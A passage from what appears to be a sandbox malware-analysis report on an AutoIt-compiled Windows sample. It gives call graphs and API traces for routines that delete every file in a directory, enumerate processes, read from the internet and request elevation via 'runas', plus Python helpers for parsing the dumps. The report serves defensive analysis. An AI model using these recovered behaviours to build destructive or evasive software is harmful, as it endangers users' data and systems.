GetStringTypeW 103817->103835 103820 9b6215 __aulldvrm 103818->103820 103836 9b659d 26 API calls 2 library calls 103818->103836 103837 9b659d 26 API calls 2 library calls 103820->103837 103822 9b64f6 103822->103824 103838 9bf649 20 API calls _free 103822->103838 103824->103799 103826 9b65ce 103825->103826 103827 9b65e1 103825->103827 103839 9bf649 20 API calls _free 103826->103839 103827->103811 103829 9b65d3 103840 9c2b5c 26 API calls __cftof 103829->103840 103831 9b65de 103831->103811 103832->103814 103833->103824 103834->103817 103835->103817 103836->103820 103837->103822 103838->103824 103839->103829 103840->103831 103842 a018b6 103841->103842 103843 9b014b 8 API calls 103842->103843 103844 a018bd 103843->103844 103847 9ffcb5 103844->103847 103846 a018f7 103846->103375 103848 99c2c9 8 API calls 103847->103848 103849 9ffcc8 CharLowerBuffW 103848->103849 103851 9ffcdb 103849->103851 103850 99655e 8 API calls 103850->103851 103851->103850 103852 9ffd19 103851->103852 103864 9ffce5 ___scrt_fastfail 103851->103864 103853 9ffd2b 103852->103853 103854 99655e 8 API calls 103852->103854 103855 9b017b 8 API calls 103853->103855 103854->103853 103859 9ffd59 103855->103859 103856 9ffd7b 103865 9ffe0c 103856->103865 103859->103856 103880 9ffbed 8 API calls 103859->103880 103860 9ffdb8 103861 9b014b 8 API calls 103860->103861 103860->103864 103862 9ffdd2 103861->103862 103863 9b017b 8 API calls 103862->103863 103863->103864 103864->103846 103866 99bf73 8 API calls 103865->103866 103867 9ffe3e 103866->103867 103868 99bf73 8 API calls 103867->103868 103869 9ffe47 103868->103869 103870 99bf73 8 API calls 103869->103870 103874 9ffe50 103870->103874 103871 998577 8 API calls 103871->103874 103872 a00114 103872->103860 103873 9b66f8 GetStringTypeW 103873->103874 103874->103871 103874->103872 103874->103873 103876 9b6641 39 API calls 103874->103876 103877 9ffe0c 40 API calls 103874->103877 103878 99ad40 8 API calls 103874->103878 103879 99bed9 8 API calls 103874->103879 103881 
9b6722 GetStringTypeW _strftime 103874->103881 103876->103874 103877->103874 103878->103874 103879->103874 103880->103859 103881->103874 103882->103384 103883->103390 103884->103402 103885->103390 103886->103417 103887->103390 103888->103254 103889->103254 103890->103250 103891->103255 103892 9a0ebf 103893 9a0ed3 103892->103893 103899 9a1425 103892->103899 103894 9a0ee5 103893->103894 103895 9b014b 8 API calls 103893->103895 103896 9e562c 103894->103896 103897 99b4c8 8 API calls 103894->103897 103898 9a0f3e 103894->103898 103895->103894 103926 a01b14 8 API calls 103896->103926 103897->103894 103901 9a2b20 280 API calls 103898->103901 103917 9a049d messages 103898->103917 103899->103894 103902 99bed9 8 API calls 103899->103902 103924 9a0376 messages 103901->103924 103902->103894 103903 9e632b 103930 a03fe1 81 API calls __wsopen_s 103903->103930 103905 9a1695 103912 99bed9 8 API calls 103905->103912 103905->103917 103907 9e625a 103929 a03fe1 81 API calls __wsopen_s 103907->103929 103908 99bed9 8 API calls 103908->103924 103909 9e5cdb 103914 99bed9 8 API calls 103909->103914 103909->103917 103912->103917 103913 9a1990 280 API calls 103913->103924 103914->103917 103915 9b05b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 103915->103924 103916 99bf73 8 API calls 103916->103924 103918 9b0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 103918->103924 103919 9e6115 103927 a03fe1 81 API calls __wsopen_s 103919->103927 103921 9b0413 29 API calls pre_c_initialization 103921->103924 103922 9b014b 8 API calls 103922->103924 103923 9a0aae messages 103928 a03fe1 81 API calls __wsopen_s 103923->103928 103924->103903 103924->103905 103924->103907 103924->103908 103924->103909 103924->103913 103924->103915 103924->103916 103924->103917 103924->103918 103924->103919 103924->103921 103924->103922 103924->103923 103925 9a1e50 40 API calls messages 103924->103925 103925->103924 
[Execution graph fragment, flattened from the interactive graph widget: node ids, function addresses with "N API calls" annotations, and "a->b" call edges; graph structure not recoverable as text.]

Windows APIs and runtime routines named in this fragment: RegOpenKeyExW, RegQueryValueExW, RegCloseKey; ReadFile, ReadConsoleW, GetConsoleMode, SetFilePointerEx, GetStdHandle, GetFileType, GetLastError; RtlAllocateHeap, RtlFreeHeap; EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, InterlockedExchange, SetEvent, ResetEvent, CreateThread, DuplicateHandle, CloseHandle, WaitForSingleObject, GetExitCodeProcess, Sleep, QueryPerformanceCounter, QueryPerformanceFrequency, timeGetTime; IsDebuggerPresent, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, ExitProcess, GetPEB, GetStartupInfoW, GetModuleHandleW, GetModuleHandleExW, GetProcAddress, FreeLibrary; AllocateAndInitializeSid, CheckTokenMembership, FreeSid; GetCurrentDirectoryW, SetCurrentDirectoryW, GetLongPathNameW, GetOpenFileNameW, ShellExecuteW, GetForegroundWindow; CreateWindowExW, ShowWindow, MoveWindow, DestroyWindow, DeleteObject, DefWindowProcW, PostQuitMessage, PeekMessageW, GetInputState, TranslateMessage, DispatchMessageW, TranslateAcceleratorW, IsDialogMessageW, GetClassLongW, SetFocus, SetTimer, KillTimer, CreatePopupMenu, RegisterWindowMessageW, Shell_NotifyIconW, MessageBoxA, SystemParametersInfoW, IsThemeActive, OleInitialize; CRT/runtime helpers _free, _abort, __onexit, __cftof, __wsopen_s, __fread_nolock, _strftime, _wcslen, __Init_thread_wait, __FrameHandler3::FrameUnwindToState, ___scrt_fastfail, try_get_first_available_module, _com_util::ConvertBSTRToString.
_free 105736->105793 105737->105736 105740 9d0454 105737->105740 105739 9d0420 105794 9c2b5c 26 API calls __cftof 105739->105794 105746 9d09db 105740->105746 105745 9d042a __fread_nolock 105745->105729 105796 9d07af 105746->105796 105749 9d0a0d 105828 9bf636 20 API calls _free 105749->105828 105750 9d0a26 105814 9c5594 105750->105814 105753 9d0a2b 105754 9d0a4b 105753->105754 105755 9d0a34 105753->105755 105827 9d071a CreateFileW 105754->105827 105830 9bf636 20 API calls _free 105755->105830 105759 9d0a39 105831 9bf649 20 API calls _free 105759->105831 105760 9d0b01 GetFileType 105765 9d0b0c GetLastError 105760->105765 105766 9d0b53 105760->105766 105762 9d0a12 105829 9bf649 20 API calls _free 105762->105829 105763 9d0ad6 GetLastError 105833 9bf613 20 API calls 2 library calls 105763->105833 105764 9d0a84 105764->105760 105764->105763 105832 9d071a CreateFileW 105764->105832 105834 9bf613 20 API calls 2 library calls 105765->105834 105836 9c54dd 21 API calls 3 library calls 105766->105836 105770 9d0b1a CloseHandle 105770->105762 105771 9d0b43 105770->105771 105835 9bf649 20 API calls _free 105771->105835 105773 9d0ac9 105773->105760 105773->105763 105775 9d0b74 105777 9d0bc0 105775->105777 105837 9d092b 72 API calls 4 library calls 105775->105837 105776 9d0b48 105776->105762 105781 9d0bed 105777->105781 105838 9d04cd 72 API calls 4 library calls 105777->105838 105780 9d0be6 105780->105781 105782 9d0bfe 105780->105782 105839 9c8a2e 105781->105839 105784 9d0478 105782->105784 105785 9d0c7c CloseHandle 105782->105785 105795 9d04a1 LeaveCriticalSection __wsopen_s 105784->105795 105854 9d071a CreateFileW 105785->105854 105787 9d0ca7 105788 9d0cb1 GetLastError 105787->105788 105789 9d0cdd 105787->105789 105855 9bf613 20 API calls 2 library calls 105788->105855 105789->105784 105791 9d0cbd 105856 9c56a6 21 API calls 3 library calls 105791->105856 105793->105739 105794->105745 105795->105745 105797 9d07d0 105796->105797 105804 9d07ea 105796->105804 105797->105804 105864 
9bf649 20 API calls _free 105797->105864 105800 9d0822 105803 9d0851 105800->105803 105866 9bf649 20 API calls _free 105800->105866 105801 9d07df 105865 9c2b5c 26 API calls __cftof 105801->105865 105812 9d08a4 105803->105812 105868 9bda7d 26 API calls 2 library calls 105803->105868 105857 9d073f 105804->105857 105807 9d089f 105809 9d091e 105807->105809 105807->105812 105808 9d0846 105867 9c2b5c 26 API calls __cftof 105808->105867 105869 9c2b6c 11 API calls _abort 105809->105869 105812->105749 105812->105750 105813 9d092a 105815 9c55a0 __FrameHandler3::FrameUnwindToState 105814->105815 105872 9c32d1 EnterCriticalSection 105815->105872 105817 9c55cc 105820 9c5373 __wsopen_s 21 API calls 105817->105820 105818 9c55a7 105818->105817 105822 9c563a EnterCriticalSection 105818->105822 105824 9c55ee 105818->105824 105823 9c55d1 105820->105823 105821 9c5617 __fread_nolock 105821->105753 105822->105824 105825 9c5647 LeaveCriticalSection 105822->105825 105823->105824 105876 9c54ba EnterCriticalSection 105823->105876 105873 9c569d 105824->105873 105825->105818 105827->105764 105828->105762 105829->105784 105830->105759 105831->105762 105832->105773 105833->105762 105834->105770 105835->105776 105836->105775 105837->105777 105838->105780 105840 9c5737 __wsopen_s 26 API calls 105839->105840 105843 9c8a3e 105840->105843 105841 9c8a44 105878 9c56a6 21 API calls 3 library calls 105841->105878 105843->105841 105844 9c8a76 105843->105844 105846 9c5737 __wsopen_s 26 API calls 105843->105846 105844->105841 105847 9c5737 __wsopen_s 26 API calls 105844->105847 105845 9c8a9c 105849 9c8abe 105845->105849 105879 9bf613 20 API calls 2 library calls 105845->105879 105850 9c8a6d 105846->105850 105848 9c8a82 FindCloseChangeNotification 105847->105848 105848->105841 105851 9c8a8e GetLastError 105848->105851 105849->105784 105853 9c5737 __wsopen_s 26 API calls 105850->105853 105851->105841 105853->105844 105854->105787 105855->105791 105856->105789 105860 9d0757 105857->105860 105858 9d0772 
105858->105800 105860->105858 105870 9bf649 20 API calls _free 105860->105870 105861 9d0796 105871 9c2b5c 26 API calls __cftof 105861->105871 105863 9d07a1 105863->105800 105864->105801 105865->105804 105866->105808 105867->105803 105868->105807 105869->105813 105870->105861 105871->105863 105872->105818 105877 9c3319 LeaveCriticalSection 105873->105877 105875 9c56a4 105875->105821 105876->105824 105877->105875 105878->105845 105879->105849 105880 9d2782 105883 992ab0 105880->105883 105884 992aef mciSendStringW 105883->105884 105885 9d3a1a DestroyWindow 105883->105885 105886 992b0b 105884->105886 105887 992d66 105884->105887 105897 9d3a26 105885->105897 105888 992b19 105886->105888 105886->105897 105887->105886 105889 992d75 UnregisterHotKey 105887->105889 105917 992ede 105888->105917 105889->105887 105891 9d3a44 FindClose 105891->105897 105893 9d3a6b 105896 9d3a7e FreeLibrary 105893->105896 105898 9d3a8f 105893->105898 105894 997aab CloseHandle 105894->105897 105895 992b2e 105895->105898 105904 992b3c 105895->105904 105896->105893 105897->105891 105897->105893 105897->105894 105899 9d3aa3 VirtualFree 105898->105899 105906 992ba9 105898->105906 105899->105898 105900 992b98 OleUninitialize 105900->105906 105901 9d3aeb 105910 9d3afa messages 105901->105910 105923 a03d30 6 API calls messages 105901->105923 105902 992bb4 105905 992bc4 105902->105905 105904->105900 105921 992ff4 10 API calls 105905->105921 105906->105901 105906->105902 105908 992bda 105922 992e1c 8 API calls 105908->105922 105913 9d3b89 105910->105913 105924 9f6e3b 8 API calls messages 105910->105924 105913->105913 105918 992eeb 105917->105918 105919 992b20 105918->105919 105925 9f7991 8 API calls 105918->105925 105919->105893 105919->105895 105921->105908 105923->105901 105924->105910 105925->105918

Control-flow Graph

• Executed
• Not Executed

[Control-flow graph for the function at 995fc8 (basic blocks 995fc8-9d526d); the rendered graph is not reproduced. Block labels show calls to 99bf73, 998577, 99adf4 and 9955dc and to the APIs GetVersionExW, GetCurrentProcess, IsWow64Process, LoadLibraryA, GetProcAddress, GetNativeSystemInfo, FreeLibrary and GetSystemInfo.]
APIs
• GetVersionExW.KERNEL32(?), ref: 00995FF7
  • Part of subcall function 00998577: _wcslen.LIBCMT ref: 0099858A
• GetCurrentProcess.KERNEL32(?,00A2DC2C,00000000,?,?), ref: 00996123
• IsWow64Process.KERNEL32(00000000,?,?), ref: 0099612A
• LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00996155
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00996167
• GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00996175
• FreeLibrary.KERNEL32(00000000,?,?), ref: 0099617C
• GetSystemInfo.KERNEL32(?,?,?), ref: 009961A1
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
• String ID: GetNativeSystemInfo$kernel32.dll$|O
• API String ID: 3290436268-3101561225
• Opcode ID: 58d8304edd1232a8c9c544daced24587c4a31a6536e60ebc8bd17d73f6f15f92
• Instruction ID: 55fd8aa427f8783be2621f107c0ae959c72088f7788d64887bbb30c2c06715a3
• Opcode Fuzzy Hash: 58d8304edd1232a8c9c544daced24587c4a31a6536e60ebc8bd17d73f6f15f92
• Instruction Fuzzy Hash: 90A17121A0EAC4CFCB21CBEC7C817A57FB46B76300B198899D4819F362C7AD454ADB71

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00993368,?), ref: 009933BB
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00993368,?), ref: 009933CE
• GetFullPathNameW.KERNEL32(00007FFF,?,?,00A62418,00A62400,?,?,?,?,?,?,00993368,?), ref: 0099343A
  • Part of subcall function 00998577: _wcslen.LIBCMT ref: 0099858A
  • Part of subcall function 0099425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00993462,00A62418,?,?,?,?,?,?,?,00993368,?), ref: 009942A0
• SetCurrentDirectoryW.KERNEL32(?,00000001,00A62418,?,?,?,?,?,?,?,00993368,?), ref: 009934BB
• MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 009D3CB0
• SetCurrentDirectoryW.KERNEL32(?,00A62418,?,?,?,?,?,?,?,00993368,?), ref: 009D3CF1
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00A531F4,00A62418,?,?,?,?,?,?,?,00993368), ref: 009D3D7A
• ShellExecuteW.SHELL32(00000000,?,?), ref: 009D3D81
  • Part of subcall function 009934D3: GetSysColorBrush.USER32(0000000F), ref: 009934DE
  • Part of subcall function 009934D3: LoadCursorW.USER32(00000000,00007F00), ref: 009934ED
  • Part of subcall function 009934D3: LoadIconW.USER32(00000063), ref: 00993503
  • Part of subcall function 009934D3: LoadIconW.USER32(000000A4), ref: 00993515
  • Part of subcall function 009934D3: LoadIconW.USER32(000000A2), ref: 00993527
  • Part of subcall function 009934D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0099353F
  • Part of subcall function 009934D3: RegisterClassExW.USER32(?), ref: 00993590
  • Part of subcall function 009935B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 009935E1
  • Part of subcall function 009935B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00993602
  • Part of subcall function 009935B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00993368,?), ref: 00993616
  • Part of subcall function 009935B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00993368,?), ref: 0099361F
  • Part of subcall function 0099396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00993A3C
Strings
• It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 009D3CAA
• AutoIt, xrefs: 009D3CA5
• runas, xrefs: 009D3D75
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
• String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
• API String ID: 683915450-2030392706
• Opcode ID: 47087b581081e6f315b116540a6411e53262f1d9e3eaa68e831763ae672d84d7
• Instruction ID: bd359684ad47ae320dc3306a427412e9e1ad12c0532533155a21e8e5029f3a0c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47087b581081e6f315b116540a6411e53262f1d9e3eaa68e831763ae672d84d7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B51E671148340AADF11EFB8DC05FBE7BB8ABD4740F00482DF592562A2DF648A4BD762

Control-flow Graph

Basic blocks (node id: address range: calls), recovered from the graph dump:
• 1141: 9fdc54-9fdc9b: call 99bf73 (x3), call 995851, call 9feab0
• 1152: 9fdc9d-9fdca6: call 996b7c
• 1153: 9fdcab-9fdcdc: call 99568e, FindFirstFileW
• 1157: 9fdcde-9fdce0
• 1158: 9fdd4b-9fdd52: FindClose
• 1159: 9fdd56-9fdd78: call 99bd98 (x3)
• 1160: 9fdce2-9fdce7
• 1162: 9fdce9-9fdd24: call 99bed9, call 997bb5, call 996b7c, DeleteFileW
• 1163: 9fdd26-9fdd38: FindNextFileW
• 1164: 9fdd3a-9fdd40
• 1176: 9fdd42-9fdd49: FindClose
Edges: 1141->1152, 1141->1153, 1152->1153, 1153->1157, 1153->1158, 1157->1158, 1157->1160, 1158->1159, 1160->1162, 1160->1163, 1162->1163, 1162->1176, 1163->1157, 1163->1164, 1164->1157, 1176->1159
Loop structure: block 1157 is the loop header; both back-edges (1163->1157 and 1164->1157) come from the FindNextFileW block, so DeleteFileW in block 1162 runs once for every directory entry that passes the check in block 1160. The two FindClose blocks (1158 and 1176) are the loop exits. Together with the "\*.*" search string listed under Similarity for this function, this is a delete-every-file-in-a-directory routine.
APIs
• Part of subcall function 00995851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009955D1,?,?,009D4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00995871
• Part of subcall function 009FEAB0: GetFileAttributesW.KERNEL32(?,009FD840), ref: 009FEAB1
• FindFirstFileW.KERNEL32(?,?), ref: 009FDCCB
• DeleteFileW.KERNEL32(?,?,?,?), ref: 009FDD1B
• FindNextFileW.KERNEL32(00000000,00000010), ref: 009FDD2C
• FindClose.KERNEL32(00000000), ref: 009FDD43
• FindClose.KERNEL32(00000000), ref: 009FDD4C
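The flattened graph dump above is much easier to reason about once it is parsed back into blocks and edges. The following Python is an added example, not part of the Joe Sandbox report or its tooling: it tokenises the `control_flow_graph` text of the routine at 0x9fdc54 (the only input, copied from this page), finds loops through DFS back-edges and natural-loop expansion, and reports which imported APIs sit inside each loop body and in the blocks the loop exits to. The `sub_` prefix for unnamed call targets and the shape of the result dictionary are this example's own conventions.

```python
"""Recover loops and the APIs they call from a Joe Sandbox control-flow-graph dump.

Added example; not part of the report. The only input is the flattened graph
text for the routine at 0x9fdc54, copied from the page. The "sub_" prefix for
unnamed call targets and the result layout are this example's own conventions.
"""
import re
from collections import defaultdict

# Constructed input: the control_flow_graph line from the report, verbatim.
CFG_TEXT = (
    "control_flow_graph 1141 9fdc54-9fdc9b call 99bf73 * 3 call 995851 call 9feab0 "
    "1152 9fdc9d-9fdca6 call 996b7c 1141->1152 1153 9fdcab-9fdcdc call 99568e "
    "FindFirstFileW 1141->1153 1152->1153 1157 9fdcde-9fdce0 1153->1157 "
    "1158 9fdd4b-9fdd52 FindClose 1153->1158 1157->1158 1160 9fdce2-9fdce7 "
    "1157->1160 1159 9fdd56-9fdd78 call 99bd98 * 3 1158->1159 1162 9fdce9-9fdd24 "
    "call 99bed9 call 997bb5 call 996b7c DeleteFileW 1160->1162 1163 9fdd26-9fdd38 "
    "FindNextFileW 1160->1163 1162->1163 1176 9fdd42-9fdd49 FindClose 1162->1176 "
    "1163->1157 1164 9fdd3a-9fdd40 1163->1164 1164->1157 1176->1159"
)

RANGE_RE = re.compile(r"^[0-9a-f]+-[0-9a-f]+$")
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")


def parse_cfg(text):
    """Tokenise the dump into {node_id: {start, end, calls}} plus an edge list."""
    toks = text.split()
    if not toks or toks[0] != "control_flow_graph":
        raise ValueError("not a control_flow_graph dump")
    nodes, edges, cur, i = {}, [], None, 1
    while i < len(toks):
        tok = toks[i]
        edge = EDGE_RE.match(tok)
        if edge:                                   # "1141->1152"
            edges.append((int(edge.group(1)), int(edge.group(2))))
            i += 1
        elif tok.isdigit() and i + 1 < len(toks) and RANGE_RE.match(toks[i + 1]):
            lo, hi = toks[i + 1].split("-")        # "1141 9fdc54-9fdc9b" opens a block
            cur = {"start": int(lo, 16), "end": int(hi, 16), "calls": []}
            nodes[int(tok)] = cur
            i += 2
        elif tok == "call":                        # "call 99bf73" or "call 99bf73 * 3"
            target, count = toks[i + 1], 1
            if i + 3 < len(toks) and toks[i + 2] == "*":
                count, i = int(toks[i + 3]), i + 4
            else:
                i += 2
            cur["calls"].extend(["sub_" + target] * count)
        else:                                      # a named import such as DeleteFileW
            cur["calls"].append(tok)
            i += 1
    return nodes, edges


def back_edges(edges, entry):
    """DFS from entry; an edge into a node still on the DFS stack is a back-edge."""
    succ = defaultdict(list)
    for a, b in edges:
        succ[a].append(b)
    state, found = defaultdict(int), []           # 0 unvisited, 1 on stack, 2 done

    def visit(n):
        state[n] = 1
        for s in succ[n]:
            if state[s] == 1:
                found.append((n, s))
            elif state[s] == 0:
                visit(s)
        state[n] = 2

    visit(entry)
    return found


def natural_loop(edges, tail, head):
    """Every node that reaches `tail` without passing through `head`, plus `head`."""
    pred = defaultdict(list)
    for a, b in edges:
        pred[b].append(a)
    body, stack = {head, tail}, [tail]
    while stack:
        for p in pred[stack.pop()]:
            if p not in body:
                body.add(p)
                stack.append(p)
    return body


def analyse(text):
    """Map each loop header to its body, the imports called inside it, and the
    imports called in the blocks the loop exits to."""
    nodes, edges = parse_cfg(text)
    entry = min(nodes, key=lambda n: nodes[n]["start"])
    loops = {}
    for tail, head in back_edges(edges, entry):
        loops.setdefault(head, set()).update(natural_loop(edges, tail, head))

    def imports(ids):
        return sorted({c for n in ids for c in nodes[n]["calls"] if not c.startswith("sub_")})

    report = {}
    for head, body in loops.items():
        exits = {b for a, b in edges if a in body and b not in body}
        report[head] = {"body": sorted(body), "apis": imports(body), "exit_apis": imports(exits)}
    return report


if __name__ == "__main__":
    for head, info in analyse(CFG_TEXT).items():
        print(f"loop @ block {head}: body={info['body']} apis={info['apis']} exits={info['exit_apis']}")
```

For this routine the only loop header is block 1157, its body contains DeleteFileW and FindNextFileW, and both exits land on FindClose, which is the per-entry delete loop described above. Running the same parser over other function records of a report gives a quick "which imports are loop-carried" view without opening the disassembler.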
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
• String ID: \*.*
• API String ID: 2649000838-1173974218
• Opcode ID: 6b30127175068668da30ec67b42c26aad836acb6f03fe94e3a090df5a9cc797e
• Instruction ID: 13cdccb532f492803f0a01b82f64a980edebacc90782efee6d6d80e75357fd0f
• Opcode Fuzzy Hash: 6b30127175068668da30ec67b42c26aad836acb6f03fe94e3a090df5a9cc797e
• Instruction Fuzzy Hash: 483170310093499BC701EB68D9819FFB7EDBE95300F404D6DF5D582191EB25DA0ACB52
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 00A0D97D
• InternetReadFile.WININET(?,00000000,?,?), ref: 00A0D9B4
• GetLastError.KERNEL32(?,00000000,?,?,?,00A0CC63,00000000), ref: 00A0D9F9
• SetEvent.KERNEL32(?,?,00000000,?,?,?,00A0CC63,00000000), ref: 00A0DA0D
• SetEvent.KERNEL32(?,?,00000000,?,?,?,00A0CC63,00000000), ref: 00A0DA37
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: EventInternet$AvailableDataErrorFileLastQueryRead
• String ID:
• API String ID: 3191363074-0
• Opcode ID: 3115e0679b6787efbc93cb33df4900ec5190be8c7f4e2d76aad55397e1b17d43
• Instruction ID: 9b5476cf23cbabe8444e2bb87fc1a64e68ca177cebc3956fedfcd8dc310ddfa9
• Opcode Fuzzy Hash: 3115e0679b6787efbc93cb33df4900ec5190be8c7f4e2d76aad55397e1b17d43
• Instruction Fuzzy Hash: D4313E72604209EFDB24DFE9E885AABB7F8EF44394B10442EE546D3591D730EE41DB60
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 009FDDAC
• Process32FirstW.KERNEL32(00000000,?), ref: 009FDDBA
• Process32NextW.KERNEL32(00000000,?), ref: 009FDDDA
• FindCloseChangeNotification.KERNEL32(00000000), ref: 009FDE87
Note: the FindCloseChangeNotification call is almost certainly CloseHandle on the Toolhelp snapshot handle. The two kernel32 exports share one address, so an address-to-name symbolizer can label a CloseHandle call with either name; do not read it as a directory-change-notification API. The sequence is a plain process-list walk.
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
• String ID:
• API String ID: 3243318325-0
• Opcode ID: a4b3a6481d1be2899e9f784c5cd720ab236d7cae056eeec93b72ea5546eff1ba
• Instruction ID: 3f3925f3f16093b081523fb8dee1807ab36fbba88086a17a6ec91f57ed182f04
• Opcode Fuzzy Hash: a4b3a6481d1be2899e9f784c5cd720ab236d7cae056eeec93b72ea5546eff1ba
• Instruction Fuzzy Hash: 34318F710083049FD710EF54D885BBFBBE8AFD9344F14092DF685871A1DB719A4ACB92
APIs
• lstrlenW.KERNEL32(?,009D46AC), ref: 009FE482
• GetFileAttributesW.KERNEL32(?), ref: 009FE491
• FindFirstFileW.KERNEL32(?,?), ref: 009FE4A2
• FindClose.KERNEL32(00000000), ref: 009FE4AE
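The four per-function API listings above (the FindFirstFileW/DeleteFileW loop, the WinINet read loop, the Toolhelp process walk, and this GetFileAttributesW/FindFirstFileW existence probe) can be turned into behaviour tags mechanically instead of by eye. The following Python is an added example, not part of the Joe Sandbox report or its tooling: it parses the `APIs` bullet lines (the sample string is constructed from this page's own lines), folds the FindCloseChangeNotification/CloseHandle export alias noted above, and matches ordered API subsequences against a small rule table. The rule names and the rule table are assumptions chosen for illustration; `Part of subcall function` lines are kept but not matched, because those calls belong to callees.

```python
"""Parse Joe Sandbox per-function "APIs" listings and tag behaviours.

Added example; not part of the report or of Joe Sandbox. SAMPLE is constructed
from the four function records on this page. Rule names, the rule table and the
record layout are this example's own choices.
"""
import re

SAMPLE = """APIs
• Part of subcall function 00995851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009955D1,?,?,009D4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00995871
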